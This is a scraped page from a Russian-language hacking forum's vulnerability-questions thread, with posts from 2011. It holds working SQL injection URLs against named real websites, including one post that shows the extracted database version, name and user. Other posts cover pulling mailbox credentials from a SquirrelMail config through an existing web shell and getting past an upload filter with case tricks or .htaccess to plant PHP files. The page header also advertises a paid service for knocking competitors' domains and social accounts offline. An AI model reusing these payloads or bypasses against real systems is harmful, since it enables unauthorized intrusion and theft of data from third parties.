УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1690 из 2438

1690

Опции темы

Поиск в этой теме

Опции просмотра

#16891

08.05.2011, 18:37

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от ZARO

ZARO said:
Есть шелл на сайте, на сервере стоит SquirrelMail. Нужно узнать пароль от ящика, как это можно сделать?

В конфиге SquirrelMail должны быть данные для подключения к базе почтового сервера.

#16892

09.05.2011, 00:06

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

народ, очень интерисует скуль иньекция которая возникает при подстановки минуса например id=-1 почему так происходит? хто может показать исходники кода при котором получится такая ошибка, спасибо

#16893

09.05.2011, 00:48

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от qaz

qaz said:
народ, очень интерисует скуль иньекция которая возникает при подстановки минуса например id=-1 почему так происходит? хто может показать исходники кода при котором получится такая ошибка, спасибо

qez

подстановка твоего вопроса не очень таки правильна

если передать -1 параметру, который передается в запрос

например

SELECT username,password FROM users WHERE id=-1;

с синтаксисом ничего не случится, тока запрос зафелсится, для посика скулей использовать "-", не правильно )

#16894

09.05.2011, 00:51

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от Tigger

Tigger said:
Помотому что параметр обрабатывается intval()'ом или приводится к типу (int)$_GET['id'].
При id=-1 запрос получается SELECT text FROM posts WHERE id=-1
Что и вызывает ошибку.

ну да, такое тоже бывает, а вообще стандартизировать нельзя никак, кодеры все мыслят по своему, бог знает что они там пишут и что получается в конце, так что все зависит от ситуации

#16895

09.05.2011, 01:11

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от Konqi

Konqi said:
qez
подстановка твоего вопроса не очень таки правильна
если передать -1 параметру, который передается в запрос
например
SELECT username,password FROM users WHERE id=-1;
с синтаксисом ничего не случится, тока запрос зафелсится, для посика скулей использовать "-", не правильно )

ну например тут

http://felixonline.co.uk/print.php?article=-900

есть же ошибка, очень интересует исходный код етого запроса

и ещо одно

http://www.animeacademy.com/finalrevdisplay.php?id=34%27%20union%20select%201, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,user%28%29 ,19,20%20%20from%20%20AnimTest%20%20where%201%20=% 20%27

как вывести какуюнибуть инфу????

#16896

09.05.2011, 01:13

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от qaz

qaz said:
ну например тут
http://felixonline.co.uk/print.php?article=-900
есть же ошибка, очень интересует исходный код етого запроса
как вывести какуюнибуть инфу????

это ошибка не из за синтаксиса, просто запрос возвращает фелс, дальше фелс передается в функцию mysql_result(); и тот в свою очередь ругается

#16897

09.05.2011, 08:24

#Wolf#

Постоянный

Регистрация: 26.03.2008

Сообщений: 311

Провел на форуме:
3799424

Репутация: 479

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]attach_filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_php_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]attach_filename[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

можно ли как-нибудь обойти?

phtml не работает.

#16898

09.05.2011, 12:43

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Цитата:

Сообщение от qaz

qaz said:
ну например тут
http://felixonline.co.uk/print.php?article=-900
есть же ошибка, очень интересует исходный код етого запроса

http://felixonline.co.uk/print.php?article=-900+union+select+concat_ws(0x3a,version(),database (),user(),@@version_compile_os),2+--+

5.0.90-log:media_felix:media_felix@localhostc-linux-gnu

Если не знаете, так не отвечайте.

#16899

09.05.2011, 12:47

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от #Wolf#

#Wolf# said:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]attach_filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'_php_'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]attach_filename[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

можно ли как-нибудь обойти?
phtml не работает.

str_replace чувствительная к регистру функция, соответственно рабочие варианты PHP, pHP, PHp, pHp.

Так же может сработать вариант залить .htaccess в котором указать нужное тебе расширение которое будет обрабатываться PHP интерпретатором.

Это если судить только по тому куску кода, что ты дал. Вполне вероятно, что $this->attach_filename принудительно переводить все символы в нижний регистр, а дальше по наклонной. В таком случае вариант с .htaccess должен сработать.

#16900

09.05.2011, 15:57

#Wolf#

Постоянный

Регистрация: 26.03.2008

Сообщений: 311

Провел на форуме:
3799424

Репутация: 479

Цитата:

Сообщение от Expl0ited

Expl0ited said:
str_replace чувствительная к регистру функция, соответственно рабочие варианты PHP, pHP, PHp, pHp.
Так же может сработать вариант залить .htaccess в котором указать нужное тебе расширение которое будет обрабатываться PHP интерпретатором.
Это если судить только по тому куску кода, что ты дал. Вполне вероятно, что $this->attach_filename принудительно переводить все символы в нижний регистр, а дальше по наклонной. В таком случае вариант с .htaccess должен сработать.

Файлы с разным регистром заливает, но отдает их на скачивание. А если добавлять с тем же регистром расширение в allowlist, оно автоматом переводится в нижний.

C htaccess не сработает, перед файлом рандомный текст добавляется.

p.s. Движок TorrentPier

Страница 1690 из 2438

1690

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход